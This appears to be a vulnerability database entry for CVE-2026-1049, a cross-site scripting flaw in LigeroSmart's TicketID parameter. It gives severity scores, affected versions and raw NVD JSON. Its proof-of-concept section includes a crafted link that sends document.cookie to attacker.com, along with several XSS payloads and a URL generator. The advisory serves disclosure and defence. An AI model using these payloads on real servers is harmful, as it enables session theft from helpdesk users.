Security Vulnerability Report
中文
CVE-2026-1049 CVSS 3.5 LOW

CVE-2026-1049

Published: 2026-01-17 18:15:49
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security vulnerability has been detected in LigeroSmart up to 6.1.26. The affected element is an unknown function of the file /otrs/index.pl. Such manipulation of the argument TicketID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ligerosmart:ligerosmart:*:*:*:*:*:*:*:* - VULNERABLE
LigeroSmart < 6.1.27
LigeroSmart 6.1.26及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-1049 PoC - LigeroSmart XSS via TicketID parameter --> <!-- Example malicious URL --> <!-- https://target.com/otrs/index.pl?Action=AgentTicketZoom;TicketID=<script>alert(document.cookie)</script> --> <!-- PoC for CVE-2026-1049 --> <html> <head> <title>CVE-2026-1049 PoC</title> </head> <body> <h1>CVE-2026-1049 - LigeroSmart XSS Proof of Concept</h1> <!-- Malicious Link --> <p>Click this link to test the XSS vulnerability:</p> <a href="http://target.com/otrs/index.pl?Action=AgentTicketZoom;TicketID=<script>alert('XSS漏洞验证成功');document.location='https://attacker.com/steal?cookie='+document.cookie</script>" target="_blank">查看工单</a> <!-- Direct payload examples --> <p>Alternative payload examples:</p> <ul> <li><script>alert(document.domain)</script></li> <li><img src=x onerror="alert('XSS')"></li> <li><svg onload="alert(document.cookie)"></svg> </ul> <!-- Automated test payload --> <script> // Test payload for automated scanning const testPayloads = [ '<script>alert(String.fromCharCode(88,83,83))</script>', '" onmouseover="alert(1)" x="', "javascript:alert('XSS')", '<img src="x" onerror="alert(document.cookie)">' ]; // Generate test URLs testPayloads.forEach(payload => { const url = `http://target.com/otrs/index.pl?Action=AgentTicketZoom;TicketID=${encodeURIComponent(payload)}`; console.log('Test URL:', url); }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1049", "sourceIdentifier": "[email protected]", "published": "2026-01-17T18:15:48.717", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in LigeroSmart up to 6.1.26. The affected element is an unknown function of the file /otrs/index.pl. Such manipulation of the argument TicketID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en LigeroSmart hasta 6.1.26. El elemento afectado es una función desconocida del archivo /otrs/index.pl. Dicha manipulación del argumento TicketID conduce a cross site scripting. Es posible lanzar el ataque remotamente. El exploit ha sido divulgado públicamente y puede ser utilizado. El proyecto fue informado del problema tempranamente a través de un informe de incidencias pero no ha respondido aún."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ligerosmart:ligerosmart:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.1.26", "matchCriteriaId": "A6446F8A-7F90-4333-A60D-2CAAC185002A"}]}]}], "references": [{"url": "https://github.com/LigeroSmart/ligerosmart/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/LigeroSmart/ligerosmart/issues/280", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/LigeroSmart/ligero ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.